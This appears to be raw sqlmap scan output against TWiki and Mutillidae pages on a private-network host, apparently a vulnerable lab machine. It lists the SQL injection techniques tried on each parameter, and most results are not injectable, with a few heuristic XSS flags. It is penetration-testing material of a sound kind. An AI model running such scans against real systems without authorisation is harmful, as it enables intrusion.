[19:18:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:18:43] [INFO] testing 'Oracle AND time-based blind'
[19:18:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:18:44] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:18:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:18:57] [WARNING] URI parameter '#1*' is not injectable
[19:18:57] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 95:
GET http://192.168.1.113/twiki/bin/search/TWiki/SearchResult?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on
do you want to test this URL? [Y/n/q]
> Y
[19:18:57] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/TWiki/SearchResult?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:18:57] [INFO] testing connection to the target URL
[19:18:59] [INFO] testing if the target URL is stable
[19:18:59] [INFO] target URL is stable
[19:18:59] [INFO] testing if URI parameter '#1*' is dynamic
[19:18:59] [INFO] confirming that URI parameter '#1*' is dynamic
[19:19:00] [WARNING] URI parameter '#1*' does not appear dynamic
[19:19:00] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:19:00] [INFO] testing for SQL injection on URI parameter '#1*'
[19:19:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:19:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:19:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:19:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:19:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:19:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:19:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:19:03] [INFO] testing 'MySQL inline queries'
[19:19:03] [INFO] testing 'PostgreSQL inline queries'
[19:19:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:19:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:19:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:19:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:19:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:19:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:19:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:19:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:19:07] [INFO] testing 'Oracle AND time-based blind'
[19:19:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:19:08] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:19:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:19:22] [WARNING] URI parameter '#1*' is not injectable
[19:19:22] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 96:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/WebChanges?t=1441456979
do you want to test this URL? [Y/n/q]
> Y
[19:19:22] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/WebChanges?t=1441456979'
[19:19:22] [INFO] testing connection to the target URL
[19:19:22] [INFO] testing if the target URL is stable
[19:19:23] [INFO] target URL is stable
[19:19:23] [INFO] testing if GET parameter 't' is dynamic
[19:19:23] [WARNING] GET parameter 't' does not appear dynamic
[19:19:23] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[19:19:23] [INFO] testing for SQL injection on GET parameter 't'
[19:19:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:19:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:19:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:19:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:19:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:19:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:19:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:19:26] [INFO] testing 'MySQL inline queries'
[19:19:26] [INFO] testing 'PostgreSQL inline queries'
[19:19:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:19:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:19:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:19:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:19:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:19:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:19:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:19:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:19:29] [INFO] testing 'Oracle AND time-based blind'
[19:19:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:19:30] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:19:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:19:42] [WARNING] GET parameter 't' is not injectable
[19:19:42] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 97:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=Web *Changes[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[19:19:42] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=Web *Changes[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:19:42] [INFO] testing connection to the target URL
[19:19:42] [INFO] testing if the target URL is stable
[19:19:43] [INFO] target URL is stable
[19:19:43] [INFO] testing if URI parameter '#1*' is dynamic
[19:19:43] [INFO] confirming that URI parameter '#1*' is dynamic
[19:19:43] [INFO] URI parameter '#1*' is dynamic
[19:19:43] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:19:43] [INFO] testing for SQL injection on URI parameter '#1*'
[19:19:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:19:43] [WARNING] reflective value(s) found and filtering out
[19:19:45] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:19:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:19:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:19:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:19:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:19:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:19:47] [INFO] testing 'MySQL inline queries'
[19:19:47] [INFO] testing 'PostgreSQL inline queries'
[19:19:47] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:19:48] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:19:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:19:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:19:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:19:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:19:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:19:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:19:51] [INFO] testing 'Oracle AND time-based blind'
[19:19:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:19:51] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:19:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:20:02] [WARNING] URI parameter '#1*' is not injectable
[19:20:02] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 98:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WebChanges?skin=print
do you want to test this URL? [Y/n/q]
> Y
[19:20:02] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebChanges?skin=print'
[19:20:02] [INFO] testing connection to the target URL
[19:20:03] [INFO] testing if the target URL is stable
[19:20:04] [INFO] target URL is stable
[19:20:04] [INFO] testing if GET parameter 'skin' is dynamic
[19:20:04] [INFO] confirming that GET parameter 'skin' is dynamic
[19:20:04] [INFO] GET parameter 'skin' is dynamic
[19:20:04] [INFO] heuristics detected web page charset 'ascii'
[19:20:04] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[19:20:04] [INFO] testing for SQL injection on GET parameter 'skin'
[19:20:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:20:04] [WARNING] reflective value(s) found and filtering out
[19:20:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:20:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:20:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:20:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:20:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:20:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:20:12] [INFO] testing 'MySQL inline queries'
[19:20:12] [INFO] testing 'PostgreSQL inline queries'
[19:20:12] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:20:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:20:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:20:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:20:15] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:20:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:20:17] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:20:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:20:20] [INFO] testing 'Oracle AND time-based blind'
[19:20:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:20:21] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:20:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:20:48] [WARNING] GET parameter 'skin' is not injectable
[19:20:48] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 99:
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebChanges?rev1=1.4&rev2=1.3
do you want to test this URL? [Y/n/q]
> Y
[19:20:48] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebChanges?rev1=1.4&rev2=1.3'
[19:20:48] [INFO] testing connection to the target URL
[19:20:48] [INFO] testing if the target URL is stable
[19:20:49] [INFO] target URL is stable
[19:20:49] [INFO] testing if GET parameter 'rev1' is dynamic
[19:20:49] [WARNING] GET parameter 'rev1' does not appear dynamic
[19:20:49] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[19:20:49] [INFO] testing for SQL injection on GET parameter 'rev1'
[19:20:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:20:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:20:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:20:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:20:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:20:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:20:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:20:52] [INFO] testing 'MySQL inline queries'
[19:20:53] [INFO] testing 'PostgreSQL inline queries'
[19:20:53] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:20:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:20:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:20:54] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:20:54] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:20:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:20:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:20:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:20:56] [INFO] testing 'Oracle AND time-based blind'
[19:20:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:20:56] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:21:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:21:09] [WARNING] GET parameter 'rev1' is not injectable
[19:21:09] [INFO] testing if GET parameter 'rev2' is dynamic
[19:21:09] [WARNING] GET parameter 'rev2' does not appear dynamic
[19:21:09] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[19:21:09] [INFO] testing for SQL injection on GET parameter 'rev2'
[19:21:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:21:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:21:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:21:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:21:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:21:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:21:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:21:14] [INFO] testing 'MySQL inline queries'
[19:21:15] [INFO] testing 'PostgreSQL inline queries'
[19:21:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:21:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:21:17] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:21:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:21:17] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:21:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:21:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:21:19] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:21:19] [INFO] testing 'Oracle AND time-based blind'
[19:21:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:21:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:21:32] [WARNING] GET parameter 'rev2' is not injectable
[19:21:32] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 100:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WebChanges?rev=1.3
do you want to test this URL? [Y/n/q]
> Y
[19:21:32] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebChanges?rev=1.3'
[19:21:32] [INFO] testing connection to the target URL
[19:21:33] [INFO] testing if the target URL is stable
[19:21:34] [INFO] target URL is stable
[19:21:34] [INFO] testing if GET parameter 'rev' is dynamic
[19:21:34] [WARNING] GET parameter 'rev' does not appear dynamic
[19:21:34] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[19:21:34] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[19:21:34] [INFO] testing for SQL injection on GET parameter 'rev'
[19:21:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:21:34] [WARNING] reflective value(s) found and filtering out
[19:21:36] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:21:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:21:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:21:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:21:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:21:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:21:39] [INFO] testing 'MySQL inline queries'
[19:21:39] [INFO] testing 'PostgreSQL inline queries'
[19:21:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:21:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:21:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:21:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:21:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:21:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:21:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:21:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:21:43] [INFO] testing 'Oracle AND time-based blind'
[19:21:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:21:43] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:21:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:22:04] [WARNING] GET parameter 'rev' is not injectable
[19:22:04] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[19:22:04] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebChanges?rev1=1.3&rev2=1.2'
[19:22:04] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebChanges?rev=1.2'
URL 101:
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/WebChanges?template=oopsmore&param1=1.4&param2=1.4
do you want to test this URL? [Y/n/q]
> Y
[19:22:04] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/WebChanges?template=oopsmore&param1=1.4&param2=1.4'
[19:22:04] [INFO] testing connection to the target URL
[19:22:04] [INFO] testing if the target URL is stable
[19:22:05] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[19:22:05] [INFO] testing if GET parameter 'template' is dynamic
[19:22:05] [INFO] confirming that GET parameter 'template' is dynamic
[19:22:05] [INFO] GET parameter 'template' is dynamic
[19:22:05] [INFO] heuristics detected web page charset 'ascii'
[19:22:05] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[19:22:05] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[19:22:05] [INFO] testing for SQL injection on GET parameter 'template'
[19:22:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:22:06] [WARNING] reflective value(s) found and filtering out
[19:22:06] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:22:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:22:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:22:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:22:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:22:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:22:08] [INFO] testing 'MySQL inline queries'
[19:22:09] [INFO] testing 'PostgreSQL inline queries'
[19:22:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:22:09] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:22:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:22:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:22:10] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:22:10] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:22:10] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:22:11] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:22:11] [INFO] testing 'Oracle AND time-based blind'
[19:22:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:22:12] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:22:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:22:21] [WARNING] GET parameter 'template' is not injectable
[19:22:21] [INFO] testing if GET parameter 'param1' is dynamic
[19:22:21] [WARNING] GET parameter 'param1' does not appear dynamic
[19:22:22] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[19:22:22] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[19:22:22] [INFO] testing for SQL injection on GET parameter 'param1'
[19:22:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:22:23] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:22:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:22:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:22:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:22:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:22:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:22:26] [INFO] testing 'MySQL inline queries'
[19:22:26] [INFO] testing 'PostgreSQL inline queries'
[19:22:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:22:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:22:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:22:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:22:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:22:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:22:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:22:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:22:30] [INFO] testing 'Oracle AND time-based blind'
[19:22:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:22:33] [INFO] target URL appears to be UNION injectable with 1 columns
[19:22:33] [WARNING] applying generic concatenation with double pipes ('||')
[19:22:33] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[19:22:39] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:22:47] [WARNING] GET parameter 'param1' is not injectable
[19:22:47] [INFO] testing if GET parameter 'param2' is dynamic
[19:22:47] [WARNING] GET parameter 'param2' does not appear dynamic
[19:22:47] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[19:22:47] [INFO] testing for SQL injection on GET parameter 'param2'
[19:22:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:22:49] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:22:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:22:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:22:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:23:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:23:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:23:08] [INFO] testing 'MySQL inline queries'
[19:23:09] [INFO] testing 'PostgreSQL inline queries'
[19:23:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:23:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:23:15] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:23:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:23:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:23:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:23:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:23:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:23:35] [INFO] testing 'Oracle AND time-based blind'
[19:23:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:24:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:24:47] [WARNING] GET parameter 'param2' is not injectable
[19:24:47] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[19:24:47] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=redirectandlog.php'
[19:24:47] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=pen-test-tool-lookup.php'
URL 102:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiHistory?t=1441457128
do you want to test this URL? [Y/n/q]
> Y
[19:24:47] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiHistory?t=1441457128'
[19:24:47] [INFO] testing connection to the target URL
[19:24:47] [INFO] testing if the target URL is stable
[19:24:48] [INFO] target URL is stable
[19:24:48] [INFO] testing if GET parameter 't' is dynamic
[19:24:48] [WARNING] GET parameter 't' does not appear dynamic
[19:24:48] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[19:24:48] [INFO] testing for SQL injection on GET parameter 't'
[19:24:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:24:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:24:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:24:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:24:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:24:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:24:53] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:24:53] [INFO] testing 'MySQL inline queries'
[19:24:53] [INFO] testing 'PostgreSQL inline queries'
[19:24:53] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
